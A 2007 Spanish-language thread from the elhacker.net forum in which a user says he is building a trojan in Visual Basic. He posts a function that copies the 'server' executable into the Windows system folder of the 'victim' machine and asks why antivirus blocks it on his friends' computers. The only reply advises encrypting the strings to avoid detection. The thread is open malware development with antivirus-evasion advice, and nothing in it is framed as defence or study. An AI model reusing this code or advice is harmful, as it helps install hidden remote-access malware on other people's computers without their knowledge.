elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Programando mi Troyano. ¿Problema de antivirus?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Programando mi Troyano. ¿Problema de antivirus?  (Leído 965 veces)
Morbius1980

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Programando mi Troyano. ¿Problema de antivirus?
« en: 16 Junio 2007, 12:49 pm »

Hola buenas,
A ver si soy capaz de explicar mi problema:

Estoy haciendo un troyano en VB. Cuando lo pruebo en mi equipo (server y client) funciona perfectamente, el NOD32(actualizado) no lo detecta.

El problema viene cuando lo ejecuto en otro equipo que no sea el mío. Lo he probado en varios de mis amigos, el server se entiende, (todos con NOD32 actualizado), y a todos les aparece este error "windows no tiene acceso al dispositivo, ruta de acceso o archivo especificado, puede que no tenga los permisos apropiados para tener acceso al elemento"
he leido por ahi que este error (en este caso no es a causa de los permisos ya q lo ejecutan como administrador) es debido al antivirus o firewall. He logrado que no aparezca este error quitandole la siguiente funcion al server :

Private Function CopiarArchivo()

Dim ejec As String
Dim sys As Folder
Dim copiar As String
Dim renombrar As String
Dim file As FileSystemObject
Set file = New FileSystemObject
Dim comillas As String

comillas = Chr(34)
ejec = App.Path                                   
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"   
ejec = comillas & ejec & "nets.exe" & comillas & " "
Set sys = file.GetSpecialFolder(1)                 
copiar = sys & "\xcopy " & ejec & sys
                                                   
If (LCase(App.Path) <> sys) Then                   
    Shell copiar 'FileCopy ejec, sys  "\nombre1"
End If

Set file = Nothing
End Function


En resumen, que con la funcion que copia el server al equipo de la victima no soy capaz de que me funcione. ¿Alguna solución? ¿Pq m funciona en mi equipo y en los demas no? ¿Problema de antivirus?

Gracias.


En línea

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: Programando mi Troyano. ¿Problema de antivirus?
« Respuesta #1 en: 16 Junio 2007, 13:46 pm »

Si usas VBS el antivirus lo detecta casi siempre al 100%

Prueba a cifrar las cadenas.

Tema movido  ;)


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema programando una agenda
Java
Fastolfe 2 4,209 Último mensaje 17 Marzo 2011, 16:02 pm
por Fastolfe
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines